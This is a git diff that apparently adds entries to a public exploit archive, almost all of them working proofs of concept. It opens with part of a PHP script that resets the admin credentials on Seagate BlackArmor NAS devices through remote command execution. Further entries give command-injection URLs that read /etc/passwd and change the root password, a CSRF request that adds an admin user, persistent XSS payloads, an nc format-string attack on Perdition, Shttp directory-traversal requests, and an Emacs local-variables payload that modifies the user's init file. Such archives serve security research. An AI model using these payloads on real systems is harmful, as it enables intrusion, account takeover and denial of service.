+ + $handle = fopen ("php://stdin","r"); + + $line = fgets($handle); + + + + if(trim($line) == "yes") { + + + + $httpResponseCode = RemoteFileExist($argv[1] . +"/backupmgt/immediate_log/instance.log"); + + + + if ($httpResponseCode == "200") { + + RemoteCodeExec($argv[1], "sed '11,16d' +/proto/SxM_webui/d41d8cd98f00b204e9800998ecf8427e.php > +/proto/SxM_webui/reset.php"); + + RemoteCodeExec($argv[1], "chmod 755 +/proto/SxM_webui/reset.php"); + + + + echo "- Now go to: " . $argv[1] . "/reset.php to +reset the default credentials to admin/admin.\n"; + + exit; + + } else { + + echo "Something went wrong, the HTTP error code is: +" . $httpResponseCode . "\n"; + + } + + } else { + + echo "Exit....\n"; + + exit; + + } + + } + + + +} else { + + echo "- No passwords were found!\n"; + + + + echo "- However, do you want to reset the admin password? [yes]:"; + + $handle = fopen ("php://stdin","r"); + + $line = fgets($handle); + + + + if(trim($line) == "yes") { + + + + $httpResponseCode = RemoteFileExist($argv[1] . +"/backupmgt/immediate_log/instance.log"); + + + + if ($httpResponseCode == "200") { + + RemoteCodeExec($argv[1], +"sed '11,16d' /proto/SxM_webui/d41d8cd98f00b204e9800998ecf8427e.php > +/proto/SxM_webui/reset.php"); + + RemoteCodeExec($argv[1], "chmod 755 +/proto/SxM_webui/reset.php"); + + + + echo "- Now go to: " . +$argv[1] . "/reset.php to reset the default credentials to admin/admin.\n"; + + exit; + + } else { + + echo "Something went wrong, the HTTP error +code is: " . $httpResponseCode . "\n"; + + } + + } else { + + echo "Exit....\n"; + + exit; + + } + +} + + + +?> \ No newline at end of file diff --git a/platforms/hardware/webapps/30725.txt b/platforms/hardware/webapps/30725.txt new file mode 100755 index 000000000..7341bac2a --- /dev/null +++ b/platforms/hardware/webapps/30725.txt @@ -0,0 +1,65 @@ +# Exploit Title: Seagate BlackArmor NAS - Remote Command Execution + +# Google Dork: N/A + +# Date: 04-01-2014 + +# Exploit Author: Jeroen - IT Nerdbox + +# Vendor Homepage: http://www.seagate.com/ + +# Software Link: + +http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/ + +# Version: sg2000-2000.1331 + +# Tested on: N/A + +# CVE : CVE-2013-6924 + +# + +## Description: + +# + +# The file getAlias.php located in /backupmgt has the following lines: + +# + +# $ipAddress = $_GET["ip"; + +# if ($ipAddress != "") { + +# exec("grep -I $ipAddress $immedLogFile > aliasHistory.txt"); + +# .. + +# .. + +# } + +# + +# The GET parameter can easily be manipulated to execute commands on the +BlackArmor system. + +# + +## Proof of Concept: + +# + +# http(s):///backupmgt/getAlias.php?ip=xx /etc/passwd; ; + +# + +## Example to change the root password to 'mypassword': + +# + +# http(s):///backupmgt/getAlias.php?ip=xx /etc/passwd; echo +'mypassword' | passwd --stdin; diff --git a/platforms/hardware/webapps/30726.2013-6922 b/platforms/hardware/webapps/30726.2013-6922 new file mode 100755 index 000000000..bbddc66e4 --- /dev/null +++ b/platforms/hardware/webapps/30726.2013-6922 @@ -0,0 +1,62 @@ +# Exploit Title: Seagate BlackArmor NAS - Cross Site Request Forgery + +# Google Dork: N/A + +# Date: 04-01-2014 + +# Exploit Author: Jeroen - IT Nerdbox + +# Vendor Homepage: http://www.seagate.com/ + +# Software Link: +http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/ + +# Version: sg2000-2000.1331 + +# Tested on: N/A + +# CVE : CVE-2013-6922 + +# + +## Description: + +# + +# There are multiple CSRF attacks possible, the proof of concept shows how +it is possible to add + +# a user with administrative privileges to the system. +# +# It is also possible to: + +# + +# 1. Factory reset the device + +# 2. Reboot the device + +# 3. Add/Edit/Remove users +# 4. Add/Edit/Remove shares and volumes + +# +# This vulnerability was reported to Seagate in September 2013, they stated +that this will not be fixed. + +# + +## Proof of Concept: + +# + +# POST: http(s):///admin/access_control_user_add.php?lang=en&gi=a001&fbt=23 +# Parameters: + +# + +# username attacker +# adminright yes +# fullname hacker +# userpasswd attackers_password +# userpasswdcheck attackers_password diff --git a/platforms/hardware/webapps/30727.txt b/platforms/hardware/webapps/30727.txt new file mode 100755 index 000000000..9afbf7973 --- /dev/null +++ b/platforms/hardware/webapps/30727.txt @@ -0,0 +1,75 @@ +# Exploit Title: Seagate BlackArmor NAS - Multiple Persistent Cross Site +Scripting Vulnerabilities + +# Google Dork: N/A + +# Date: 04-01-2014 + +# Exploit Author: Jeroen - IT Nerdbox + +# Vendor Homepage: http://www.seagate.com/ + +# Software Link: + +http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/ + +# Version: sg2000-2000.1331 + +# Tested on: N/A + +# CVE : CVE-2013-6923 + +# + +## Description: + +# + +# When adding a user to the device, it is possible to enter a full name. +This input field does not + +# sanitize its input and it is possible to enter any payload which will get +executed upon reload. + +# + +# The workgroup configuration is also vulnerable to persistent XSS. The Work +Group name input +# field does not sanitize its input. + +# +# This vulnerability was reported to Seagate in September 2013, they stated +that this will not be fixed. + +# + +## Proof of Concept #1: + +# + +# POST: http(s):///admin/access_control_user_edit.php?id=2&lang=en +# Parameters: + +# + +# index = 2 +# fullname = +# submit = Submit + +# + +# + +## Proof of Concept #2: + +# + +# POST: http(s):///admin/network_workgroup_domain.php?lang=en&gi=n003 + +# Parameter: + +# + +# workname = "> diff --git a/platforms/linux/dos/30724.txt b/platforms/linux/dos/30724.txt new file mode 100755 index 000000000..573f7afd1 --- /dev/null +++ b/platforms/linux/dos/30724.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/26270/info + +Perdition IMAP proxy server is prone to a remote format-string vulnerability because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function. + +An attacker can exploit this issue to execute arbitrary machine code in the context of the affected application. A successful attack will compromise the application. Failed attempts may cause denial-of-service conditions. + +This issue affects Perdition 1.17 and prior versions. + +The following proof of concept is available: + +perl -e 'print "abc%n\x00\n"' | nc perdition.example.com 143 \ No newline at end of file diff --git a/platforms/linux/remote/30711.txt b/platforms/linux/remote/30711.txt new file mode 100755 index 000000000..81d6e4750 --- /dev/null +++ b/platforms/linux/remote/30711.txt @@ -0,0 +1,26 @@ +source: http://www.securityfocus.com/bid/26212/info + +Shttp is prone to a remote directory-traversal vulnerability. + +A remote attacker can exploit this issue by using directory-traversal sequences to retrieve arbitrary files on a victim user's computer. + +Versions prior to Shttp0.0.5 are vulnerable to this issue. + +HEAD /../../etc/passwd HTTP/1.0 + +HTTP/1.1 400 Bad Request +Content-Type: text/html +Server: Shttp/ServerKit +Date: Thu, 25 Oct 2007 16:31:30 GMT +Connection: close + + +HEAD /../../var/log/messages HTTP/1.0 + +HTTP/1.1 200 OK +Content-Length: 178455 +Content-Type: text/plain +Last-Modified: Thu, 25 Oct 2007 16:36:39 GMT +Server: Shttp/ServerKit +Date: Thu, 25 Oct 2007 16:42:32 GMT +Connection: close \ No newline at end of file diff --git a/platforms/linux/remote/30736.txt b/platforms/linux/remote/30736.txt new file mode 100755 index 000000000..1820587d0 --- /dev/null +++ b/platforms/linux/remote/30736.txt @@ -0,0 +1,21 @@ +source: http://www.securityfocus.com/bid/26327/info + +Emacs is prone to a vulnerability that lets attackers execute arbitrary code. + +Due to a design error, the application ignores certain security settings and modifies local variables. + +By supplying a malicious file, an attacker can exploit this issue to carry out various attacks, including executing arbitrary code in the context of the application. This may facilitate remote unauthorized access. + +This issue affects Emacs 22.1; other versions may be vulnerable as well. + +This is a harmless text file. Or at least it looks like one. In +fact, it is. But it's almost not. If you were to change the word +"variaboles" below to "variables", then load it into a vulnerable +Emacs 22 with `enable-local-variables' set to :safe, it would rewrite +the local variables list in the buffer itself to _look_ like a +harmless text file, while in fact managing to add some evil code to +the end of your user-init-file. Woopsy. + +| Local variaboles: +| hack-local-variables-hook: ((lambda () (save-excursion (with-temp-buffer (insert "\n(run-with-timer 1 nil (lambda () (beep) (message \"Your Emacs init file is compromised!\")))") (append-to-file (point-min) (point-max) user-init-file)) (message nil) (with-current-buffer (get-buffer "*Messages*") (when (search-backward (concat "Added to " user-init-file) nil t) (let ((start (point-at-bol))) (forward-line +1) (delete-region start (point))))) (goto-char (point-max)) (search-backward "| hack-local-variables-hook") (let ((start (point-at-bol))) (forward-line +1) (delete-region start (point))) (insert "| mode: text\n") (set-buffer-modified-p nil) (text-mode)))) +| End: diff --git a/platforms/linux/remote/30744.txt b/platforms/linux/remote/30744.txt new file mode 100755 index 000000000..0dba485a6 --- /dev/null +++ b/platforms/linux/remote/30744.txt @@ -0,0 +1,22 @@ +source: http://www.securityfocus.com/bid/26353/info + +MySQL is prone to a remote denial-of-service vulnerability because the database server fails to properly handle unexpected input. + +Exploiting this issue allows remote attackers to crash affected database servers, denying service to legitimate users. Attackers must be able to execute arbitrary SQL statements on affected servers, which requires valid credentials to connect to affected servers. + +This issue affects MySQL 5.1.23 and prior versions. + +mysql> CREATE TABLE `test` ( +`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY, +`foo` text NOT NULL +) ENGINE=InnoDB DEFAULT CHARSET=latin1; +Query OK, 0 rows affected + +mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar'); +Empty set + +mysql> ALTER TABLE test ADD INDEX (foo(100)); +Query OK, 0 rows affected +Records: 0 Duplicates: 0 Warnings: 0 + +mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar'); \ No newline at end of file diff --git a/platforms/multiple/dos/30713.html b/platforms/multiple/dos/30713.html new file mode 100755 index 000000000..0690e41c4 --- /dev/null +++ b/platforms/multiple/dos/30713.html @@ -0,0 +1,61 @@ +source: http://www.securityfocus.com/bid/26216/info + +Mozilla Firefox is prone to a vulnerability that results in a persistent denial of service. + +This issue occurs when a victim sets a malicious bookmark and then follows it. + +Successful attacks will cause Firefox to stop responding to all URI requests. + +NOTE: This condition persists even after the browser is restarted. + +Mozilla Firefox 2.0.0.8 is vulnerable; other versions may also be affected. + + diff --git a/platforms/multiple/remote/30729.txt b/platforms/multiple/remote/30729.txt new file mode 100755 index 000000000..9af20d10a --- /dev/null +++ b/platforms/multiple/remote/30729.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/26286/info + +Blue Coat ProxySG Management Console is prone to two cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Versions prior to ProxySG 4.2.6.1 and 5.2.2.5 are vulnerable. + +NOTE: This BID originally covered one issue, but was updated to also cover a second issue. + +https://www.example.com:8082/Secure/Local/console/install_upload_action/crl_format?name="%00 https://www.example.com:8082/Secure/Local/console/install_upload_from_file.htm?file= + + + + + + \ No newline at end of file diff --git a/platforms/windows/remote/30720.html b/platforms/windows/remote/30720.html new file mode 100755 index 000000000..66247fc52 --- /dev/null +++ b/platforms/windows/remote/30720.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/26244/info + +GlobalLink is prone to a stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer. + +An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. + +GlobalLink 2.7.0.8 is affected by this issue; other versions may also be vulnerable. + +